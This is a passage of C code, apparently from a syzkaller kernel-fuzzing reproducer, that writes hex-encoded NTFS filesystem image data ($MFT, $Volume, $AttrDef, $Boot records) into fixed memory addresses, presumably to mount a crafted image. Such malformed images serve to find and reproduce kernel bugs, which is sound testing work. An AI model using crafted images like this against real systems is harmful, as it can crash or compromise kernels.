      "\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00"
      "\x00\x00\x10\x00\x00\x00\x60\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00"
      "\x48\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x68\x00\x00\x00\x00\x00"
      "\x18\x00\x00\x00\x02\x00\x4a\x00\x00\x00\x18\x00\x01\x00\x05\x00\x00\x00"
      "\x00\x00\x05\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x00\x70\x00\x00\x00\x00\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x00\x06\x00"
      "\x00\x00\x00\x00\x00\x00\x04\x03\x24\x00\x4d\x00\x46\x00\x54\x00\x00\x00"
      "\x00\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00"
      "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00"
      "\x40\x00\x00\x00\x00\x00\x00\x00\x00\x30\x01\x00\x00\x00\x00\x00\x00\x18"
      "\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x11\x13\x04\x00"
      "\x00\x00\x00\x00\xb0\x00\x00\x00\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00"
      "\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x40\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x01\x02\x00"
      "\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00",
      416));
  NONFAILING(*(uint64_t*)0x20000250 = 0x1a0);
  NONFAILING(*(uint64_t*)0x20000258 = 0x4000);
  NONFAILING(*(uint64_t*)0x20000260 = 0x20010500);
  NONFAILING(memcpy((void*)0x20010500, "\000\000\000\000\000\000\000\000\000"
                                       "\000\000\000\000\000\000\000\000\000"
                                       "\000\000\000\000\000\000\000\000\000"
                                       "\000\000\000\b\000",
                    32));
  NONFAILING(*(uint64_t*)0x20000268 = 0x20);
  NONFAILING(*(uint64_t*)0x20000270 = 0x41e0);
  NONFAILING(*(uint64_t*)0x20000278 = 0x20010600);
  NONFAILING(memcpy(
      (void*)0x20010600,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x38\x00"
      "\x01\x00\x58\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x03\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x60\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x48\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x30\x00\x00\x00\x70\x00\x00\x00\x00\x00\x18\x00\x00\x00"
      "\x02\x00\x52\x00\x00\x00\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05"
      "\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x10\x00\x00"
      "\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
      "\x00\x00\x08\x03\x24\x00\x4d\x00\x46\x00\x54\x00\x4d\x00\x69\x00\x72\x00"
      "\x72\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x01\x00"
      "\x40\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
      "\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
      "\x21\x01\xff\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00",
      384));
  NONFAILING(*(uint64_t*)0x20000280 = 0x180);
  NONFAILING(*(uint64_t*)0x20000288 = 0x43e0);
  NONFAILING(*(uint64_t*)0x20000290 = 0);
  NONFAILING(*(uint64_t*)0x20000298 = 0);
  NONFAILING(*(uint64_t*)0x200002a0 = 0x45e0);
  NONFAILING(*(uint64_t*)0x200002a8 = 0);
  NONFAILING(*(uint64_t*)0x200002b0 = 0);
  NONFAILING(*(uint64_t*)0x200002b8 = 0x47e0);
  NONFAILING(*(uint64_t*)0x200002c0 = 0);
  NONFAILING(*(uint64_t*)0x200002c8 = 0);
  NONFAILING(*(uint64_t*)0x200002d0 = 0x49e0);
  NONFAILING(*(uint64_t*)0x200002d8 = 0x20010c00);
  NONFAILING(memcpy(
      (void*)0x20010c00,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x01\x00\x38\x00"
      "\x01\x00\xe0\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x06\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x48\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x30\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00"
      "\x00\x00\x68\x00\x00\x00\x00\x00\x18\x00\x00\x00\x01\x00\x50\x00\x00\x00"
      "\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x03\x24\x00"
      "\x56\x00\x6f\x00\x6c\x00\x75\x00\x6d\x00\x65\x00\x50\x00\x00\x00\x80\x00"
      "\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x64\x00\x00\x00\x18\x00\x00\x00"
      "\x01\x00\x04\x80\x48\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x14\x00"
      "\x00\x00\x02\x00\x34\x00\x02\x00\x00\x00\x00\x00\x14\x00\x9f\x01\x12\x00"
      "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00\x00\x00\x18\x00\x9f\x01"
      "\x12\x00\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00"
      "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00\x01\x02\x00\x00\x00\x00"
      "\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00"
      "\x30\x00\x00\x00\x00\x00\x18\x00\x00\x00\x04\x00\x12\x00\x00\x00\x18\x00"
      "\x00\x00\x73\x00\x79\x00\x7a\x00\x6b\x00\x61\x00\x6c\x00\x6c\x00\x65\x00"
      "\x72\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x28\x00\x00\x00\x00\x00"
      "\x18\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x03\x01\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x18\x00"
      "\x00\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x00\x00\x18\x00\x00\x00"
      "\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x02\x00",
      544));
  NONFAILING(*(uint64_t*)0x200002e0 = 0x220);
  NONFAILING(*(uint64_t*)0x200002e8 = 0x4be0);
  NONFAILING(*(uint64_t*)0x200002f0 = 0x20010f00);
  NONFAILING(memcpy(
      (void*)0x20010f00,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x01\x00\x38\x00"
      "\x01\x00\xc0\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x04\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x48\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x30\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00"
      "\x00\x00\x70\x00\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x52\x00\x00\x00"
      "\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x0a"
      "\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x08\x03\x24\x00"
      "\x41\x00\x74\x00\x74\x00\x72\x00\x44\x00\x65\x00\x66\x00\x00\x00\x00\x00"
      "\x00\x00\x50\x00\x00\x00\x80\x00\x00\x00\x00\x00\x18\x00\x00\x00\x03\x00"
      "\x64\x00\x00\x00\x18\x00\x00\x00\x01\x00\x04\x80\x48\x00\x00\x00\x54\x00"
      "\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x34\x00\x02\x00\x00\x00"
      "\x00\x00\x14\x00\x89\x00\x12\x00\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00"
      "\x00\x00\x00\x00\x18\x00\x89\x00\x12\x00\x01\x02\x00\x00\x00\x00\x00\x05"
      "\x20\x00\x00\x00\x20\x02\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00"
      "\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00"
      "\x00\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00"
      "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x40\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x0a"
      "\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x11\x01\x46\x00"
      "\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00",
      480));
  NONFAILING(*(uint64_t*)0x200002f8 = 0x1e0);
  NONFAILING(*(uint64_t*)0x20000300 = 0x4fe0);
  NONFAILING(*(uint64_t*)0x20000308 = 0x20011100);
  NONFAILING(memcpy((void*)0x20011100, "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x02\x00",
                    32));
  NONFAILING(*(uint64_t*)0x20000310 = 0x20);
  NONFAILING(*(uint64_t*)0x20000318 = 0x51e0);
  NONFAILING(*(uint64_t*)0x20000320 = 0x20011200);
  NONFAILING(memcpy(
      (void*)0x20011200,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x01\x00\x38\x00"
      "\x03\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x06\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x48\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x30\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\xbb\x69\x7c\x00\xc8\x8d"
      "\xd6\x01\xbb\x69\x7c\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00"
      "\x00\x00\x60\x00\x00\x00\x00\x00\x18\x00\x00\x00\x01\x00\x44\x00\x00\x00"
      "\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x06\x00\x00\x10\x00\x00\x00\x00\x01\x03\x2e\x00"
      "\x00\x00\x00\x00\x50\x00\x00\x00\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00"
      "\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
      "\x40\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x2c\x10"
      "\x00\x00\x00\x00\x00\x00\x2c\x10\x00\x00\x00\x00\x00\x00\x11\x02\x43\x00"
      "\x00\x00\x00\x00\x90\x00\x00\x00\x58\x00\x00\x00\x00\x04\x18\x00\x00\x00"
      "\x03\x00\x38\x00\x00\x00\x20\x00\x00\x00\x24\x00\x49\x00\x33\x00\x30\x00"
      "\x30\x00\x00\x00\x01\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x10\x00"
      "\x00\x00\x28\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\xa0\x00\x00\x00\x50\x00\x00\x00\x01\x04\x40\x00\x00\x00\x05\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00"
      "\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x24\x00\x49\x00\x33\x00"
      "\x30\x00\x11\x01\x45\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x28\x00\x00\x00"
      "\x00\x04\x18\x19\x00\x00\x04\x00\x08\x00\x00\x00\x20\x00\x00\x00\x24\x00"
      "\x49\x00\x33\x00\x30\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
      "\x00\x00\x07\x00",
      544));
  NONFAILING(*(uint64_t*)0x20000328 = 0x220);
  NONFAILING(*(uint64_t*)0x20000330 = 0x53e0);
  NONFAILING(*(uint64_t*)0x20000338 = 0x20011500);
  NONFAILING(memcpy(
      (void*)0x20011500,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x01\x00\x38\x00"
      "\x01\x00\x50\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x03\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x60\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x48\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x30\x00\x00\x00\x68\x00\x00\x00\x00\x00\x18\x00\x00\x00"
      "\x02\x00\x50\x00\x00\x00\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05"
      "\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x10\x00\x00"
      "\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
      "\x00\x00\x07\x03\x24\x00\x42\x00\x69\x00\x74\x00\x6d\x00\x61\x00\x70\x00"
      "\x80\x00\x00\x00\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00\x01\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"
      "\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x11\x01\x47\x00\x00\x00\x00\x00"
      "\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00",
      384));
  NONFAILING(*(uint64_t*)0x20000340 = 0x180);
  NONFAILING(*(uint64_t*)0x20000348 = 0x57e0);
  NONFAILING(*(uint64_t*)0x20000350 = 0x20011700);
  NONFAILING(memcpy((void*)0x20011700, "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                                       "\x00\x00\x00\x02\x00",
                    32));
  NONFAILING(*(uint64_t*)0x20000358 = 0x20);
  NONFAILING(*(uint64_t*)0x20000360 = 0x59e0);
  NONFAILING(*(uint64_t*)0x20000368 = 0x20011800);
  NONFAILING(memcpy(
      (void*)0x20011800,
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x46\x49\x4c\x45"
      "\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x01\x00\x38\x00"
      "\x01\x00\xb8\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x04\x00\x00\x00\x07\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00"
      "\x00\x00\x48\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x30\x00\x00\x00"
      "\x18\x00\x00\x00\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00"
      "\x00\x00\x68\x00\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x4c\x00\x00\x00"
      "\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x05\x00\x80\x05\x2e\x00\xc8\x8d"
      "\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x80\x05\x2e\x00\xc8\x8d\xd6\x01"
      "\x80\x05\x2e\x00\xc8\x8d\xd6\x01\x00\x20\x00\x00\x00\x00\x00\x00\x00\x20"
      "\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x03\x24\x00"
      "\x42\x00\x6f\x00\x6f\x00\x74\x00\x00\x00\x00\x00\x50\x00\x00\x00\x80\x00"
      "\x00\x00\x00\x00\x18\x00\x00\x00\x03\x00\x64\x00\x00\x00\x18\x00\x00\x00"
      "\x01\x00\x04\x80\x48\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x14\x00"
      "\x00\x00\x02\x00\x34\x00\x02\x00\x00\x00\x00\x00\x14\x00\x89\x00\x12\x00"
      "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00\x00\x00\x18\x00\x89\x00"
      "\x12\x00\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00"
      "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00\x01\x02\x00\x00\x00\x00"
      "\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00"
      "\x48\x00\x00\x00\x01\x00\x40\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x20\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x20"
      "\x00\x00\x00\x00\x00\x00\x11\x02\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
      480));
  NONFAILING(*(uint64_t*)0x20000370 = 0x1e0);
  NONFAILING(*(uint64_t*)0x20000378 = 0x5be0);
  NONFAILING(*(uint64_t*)0x20000380 = 0);
  NONFAILING(*(uint64_t*)0x20000388 = 0);
  NONFAILING(*(uint64_t*)0x20000390 = 0x5de0);
  NONFAILING(*(uint64_t*)0x20000398 = 0);
  NONFAILING(*(uint64_t*)0x200003a0 = 0);
  NONFAILING(*(uint64_t*)0x200003a8 = 0x5fe0);
  NONFAILING(*(uint64_t*)0x200003b0 = 0);
  NONFAILING(*(uint64_t*)0x200003b8 = 0);
  NONFAILING(*(uint64_t*)0x200003c0 = 0x61e0);
  NONFAILING(*(uint64_t*)0x200003c8 = 0);
  NONFAILING(*(uint64_t*)0x200003d0 = 0);
  NONFAILING(*(uint64_t*)0x200003d8 = 0x63e0);
  NONFAILING(*(uint64_t*)0x200003e0 = 0);
  NONFAILING(*(uint64_t*)0x200003e8 = 0);
  NONFAILING(*(uint64_t*)0x200003f0 = 0x67e0);
  NONFAILING(*(uint64_t*)0x200003f8 = 0);
  NONFAILING(*(uint64_t*)0x20000400 = 0);
  NONFAILING(*(uint64_t*)0x20000408 = 0x69e0);
  NONFAILING(*(uint64_t*)0x20000410 = 0);
  NONFAILING(*(uint64_t*)0x20000418 = 0);
  NONFAILING(*(uint64_t*)0x20000420 = 0x6be0);
  NONFAILING(*(uint64_t*)0x20000428 = 0);
  NONFAILING(*(uint64_t*)0x20000430 = 0);
  NONFAILING(*(uint64_t*)0x20000438 = 0x6fe0);
  NONFAILING(*(uint64_t*)0x20000440 = 0);
  NONFAILING(*(uint64_t*)0x20000448 = 0);
  NONFAILING(*(uint64_t*)0x20000450 = 0x71e0);
  NONFAILING(*(uint64_t*)0x20000458 = 0);
  NONFAILING(*(uint64_t*)0x20000460 = 0);
  NONFAILING(*(uint64_t*)0x20000468 = 0x73e0);
  NONFAILING(*(uint64_t*)0x20000470 = 0);
  NONFAILING(*(uint64_t*)0x20000478 = 0);
  NONFAILING(*(uint64_t*)0x20000480 = 0x75e0);
  NONFAILING(*(uint64_t*)0x20000488 = 0);
  NONFAILING(*(uint64_t*)0x20000490 = 0);
  NONFAILING(*(uint64_t*)0x20000498 = 0x77e0);
  NONFAILING(*(uint64_t*)0x200004a0 = 0);
  NONFAILING(*(uint64_t*)0x200004a8 = 0);
  NONFAILING(*(uint64_t*)0x200004b0 = 0x79e0);
  NONFAILING(*(uint64_t*)0x200004b8 = 0);
  NONFAILING(*(uint64_t*)0x200004c0 = 0);
  NONFAILING(*(uint64_t*)0x200004c8 = 0x7be0);
  NONFAILING(*(uint64_t*)0x200004d0 = 0);
  NONFAILING(*(uint64_t*)0x200004d8 = 0);
  NONFAILING(*(uint64_t*)0x200004e0 = 0x7de0);
  NONFAILING(*(uint64_t*)0x200004e8 = 0);
  NONFAILING(*(uint64_t*)0x200004f0 = 0);
  NONFAILING(*(uint64_t*)0x200004f8 = 0x7fe0);
  NONFAILING(*(uint64_t*)0x20000500 = 0);
  NONFAILING(*(uint64_t*)0x20000508 = 0);
  NONFAILING(*(uint64_t*)0x20000510 = 0x81e0);
  NONFAILING(*(uint64_t*)0x20000518 = 0);
  NONFAILING(*(uint64_t*)0x20000520 = 0);
  NONFAILING(*(uint64_t*)0x20000528 = 0x83e0);
  NONFAILING(*(uint64_t*)0x20000530 = 0);
  NONFAILING(*(uint64_t*)0x20000538 = 0);
  NONFAILING(*(uint64_t*)0x20000540 = 0x85e0);
  NONFAILING(*(uint64_t*)0x20000548 = 0);
  NONFAILING(*(uint64_t*)0x20000550 = 0);
  NONFAILING(*(uint64_t*)0x20000558 = 0x87e0);
  NONFAILING(*(uint64_t*)0x20000560 = 0);
  NONFAILING(*(uint64_t*)0x20000568 = 0);
  NONFAILING(*(uint64_t*)0x20000570 = 0x89e0);
  NONFAILING(*(uint64_t*)0x20000578 = 0);
  NONFAILING(*(uint64_t*)0x20000580 = 0);
  NONFAILING(*(uint64_t*)0x20000588 = 0x8be0);
  NONFAILING(*(uint64_t*)0x20000590 = 0);
  NONFAILING(*(uint64_t*)0x20000598 = 0);
  NONFAILING(*(uint64_t*)0x200005a0 = 0x8de0);
  NONFAILING(*(uint64_t*)0x200005a8 = 0);
  NONFAILING(*(uint64_t*)0x200005b0 = 0);
  NONFAILING(*(uint64_t*)0x200005b8 = 0x8fe0);
  NONFAILING(*(uint64_t*)0x200005c0 = 0);
  NONFAILING(*(uint64_t*)0x200005c8 = 0);
  NONFAILING(*(uint64_t*)0x200005d0 = 0x91e0);
  NONFAILING(*(uint64_t*)0x200005d8 = 0);
  NONFAILING(*(uint64_t*)0x200005e0 = 0);
  NONFAILING(*(uint64_t*)0x200005e8 = 0x93e0);
  NONFAILING(*(uint64_t*)0x200005f0 = 0);
  NONFAILING(*(uint64_t*)0x200005f8 = 0);
  NONFAILING(*(uint64_t*)0x20000600 = 0x95e0);
  NONFAILING(*(uint64_t*)0x20000608 = 0);
  NONFAILING(*(uint64_t*)0x20000610 = 0);
  NONFAILING(*(uint64_t*)0x20000618 = 0x97e0);
  NONFAILING(*(uint64_t*)0x20000620 = 0);
  NONFAILING(*(uint64_t*)0x20000628 = 0);
  NONFAILING(*(uint64_t*)0x20000630 = 0x99e0);
  NONFAILING(*(uint64_t*)0x20000638 = 0);
  NONFAILING(*(uint64_t*)0x20000640 = 0);
